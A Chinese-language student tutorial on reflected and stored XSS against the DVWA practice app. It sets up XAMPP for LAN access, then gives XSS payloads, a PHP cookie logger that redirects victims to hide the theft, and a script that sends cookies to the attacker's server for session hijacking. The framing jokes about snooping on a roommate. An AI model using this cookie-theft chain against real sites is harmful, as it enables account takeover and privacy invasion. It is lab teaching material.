課堂上要求學生自由組隊準備一個安全相關的主題講解，於是會興沖沖的找到學霸想抱大腿。最近應大腿的需求，決定要補充ppt一部分內容以掩蓋我們打醬油的真面目，大胖這裡是學霸的外號的意思是一個醬油的技術點太醬油，兩個醬油的技術點拼起來就刁刁的叻！
前一篇醬油技術是
登陸會話劫持
還有一個醬油技術就是本文了。
也是醉了，後來確定的主題竟然是如何幫助同學檢視室友空間，更醉的是，這種猥瑣的事情要讓我來做！然而我並不會web安全，我只想安安靜靜的看彙編！
於是經過一番吐槽之後我躁動的心終於平靜下來，下面進入正題：

環境

伺服器：Apache
資料庫：MySQL
網址：192.168.1.104/dvwa
訪問者：192.168.1.113

關於如何安裝dvwa網上的教程很多，這裡不再敖述，可以搜尋一下，需要注意的是，xampp埠被佔用和區域網訪問的兩個問題。
端口占用

1．80埠衝突，解決方法：
開啟目錄C:\xampp\apache\conf(我的安裝目錄為C:\xampp)下的httpd.conf檔案，將Listen 80和 ServerName localhost:80中的80改為8081或其它值（儘量不要使用0－1023埠，這個是系統保留埠），要保持一致。
2．監聽埠443衝突，解決方法：
開啟目錄C:\xampp\apache\conf\extra (我的安裝目錄為C:\xampp)下的httpd-ssl.conf檔案，將Listen 443這句註釋掉：# Listen 443或將443改為4433或其它值（儘量不要使用0－1023）。

區域網訪問

1. 修改httpd.conf(xampp/apache/conf/httpd.conf)
   把Listen 80改成Listen 192.168.0.188:80
   192.168.0.188換成實際伺服器的ip地址

2. 開啟httpd-xampp.conf(/xampp/apache/conf/extra/httpd-xampp.conf)
   搜尋關鍵字: Order deny,allow
   然後在Order deny,allow下面一行有句 Deny from all
   在Deny from all前加上#
   完整形式：

<LocationMatch "^/(?i:(?:xampp|security|licenses|phpmyadmin|webalizer|server-status|server-info))">
 

    Order deny,allow
    #Deny from all
    Allow from 127.0.0.0/8
       # Require local
    ErrorDocument 403 /error/XAMPP_FORBIDDEN.html.var
</LocationMatch>

配置好環境，在區域網下能夠成功訪問，就可以開始著手攻擊了

攻擊

xss reflected

發現漏洞

xss發生在一切由輸入輸出的地方。訪問網頁的時候發現遇到這樣的視窗，在輸入venidic的時候，瀏覽器直接返回成這樣的資料

右鍵檢視原始碼，發現根本沒有做任何的過濾就直接返回了

<div class="vulnerable_code_area">

        <form name="XSS" action="#" method="GET">
            <p>What's your name?</p>
            <input type="text" name="name">
            <input type="submit" value="Submit">
        </form>

        <pre>Hello venidic </pre>

    </div>

那我們直接可以利用</pre>閉合掉前面的一個<pre>標籤，然後用<pre>閉合掉</pre>，在中間就可以填寫攻擊程式碼了
構造測試程式碼

</pre><script>alert('xss')</script><pre>

測試成功

利用漏洞

之前一直用xss就是彈個框以證實漏洞的存在，然而著並沒有什麼卵用，xss的猥瑣之處在於它處於前端，可以很容易的造成js指令碼在瀏覽器任意執行，達到竊取cookie，劫持使用者會話，甚至是開發出xss worm。因為本人web實在太渣，所以只會講最基本的盜取cookie的利用方式：

想要記錄來訪者cookie需要寫一個指令碼，如果受害者觸發了這段js，則指令碼就會記錄下受害者的cookie
截獲cookie的php指令碼

<?php

$cookie = $_GET['cookie']; //以GET方式獲取cookie變數值
$ip = getenv ('REMOTE_ADDR'); //遠端主機IP地址
$time=date('Y-m-d g:i:s'); //以“年-月-日 時：分：秒”的格式顯示時間
$referer=getenv ('HTTP_REFERER'); //連結來源
$agent = $_SERVER['HTTP_USER_AGENT']; //使用者瀏覽器型別

$fp = fopen('cookie.txt', 'a'); //開啟cookie.txt，若不存在則建立它
fwrite($fp," IP: " .$ip. "\n Date and Time: " .$time. "\n User Agent:".$agent."\n Referer: ".$referer."\n Cookie: ".$cookie."\n\n\n"); //寫入檔案
fclose($fp); //關閉檔案

header("Location: http://www.baidu.com")//重定向到baidu，防止發現
?>

那麼js攻擊程式碼就可以這樣寫：

</pre><script>document.location = 'http://192.168.1.104/acceptcookie.php?cookie=' + document.cookie;</script><pre>

點選提交
網頁被重定向到了baidu，證明攻擊成功

開啟指令碼同目錄下的cookie.txt

劫持成功

開啟桂林老兵瀏覽器，修改cookie，然後登陸主頁，無需密碼直接進入

利用成功

xss stored

發現漏洞

繼續瀏覽，發現有留言本

隨便填寫，發現沒有任何過濾

攻擊程式碼
message處：

<script>alert('xss')</script>

提交

觸發成功，退出網站
此時，我作為網站管理員從伺服器出進入網站管理

觸發成功，作為遊客瀏覽留言板，同樣觸發成功。

利用漏洞

xss利用相當靈活，最簡單的cookie竊取的方法同上。

後

抱大腿的工作到這裡就結束啦，希望學霸上課演講順利！不要辜負我在考試周前放棄預習，熬夜準備這個鬼而長出來的痘痘！

//                            _ooOoo_  
//                           o8888888o  
//                           88" . "88  
//                           (| -_- |)  
//                            O\ = /O  
//                        ____/`---'\____  
//                      .   ' \\| |// `.  
//                       / \\||| : |||// \  
//                     / _||||| -:- |||||- \  
//                       | | \\\ - /// | |  
//                     | \_| ''\---/'' | |  
//                      \ .-\__ `-` ___/-. /  
//                   ___`. .' /--.--\ `. . __  
//                ."" '< `.___\_<|>_/___.' >'"".  
//               | | : `- \`.;`\ _ /`;.`/ - ` : | |  
//                 \ \ `-. \_ __\ /__ _/ .-` / /  
//         ======`-.____`-.___\_____/___.-`____.-'======  
//                            `=---='  
//  
//         .............................................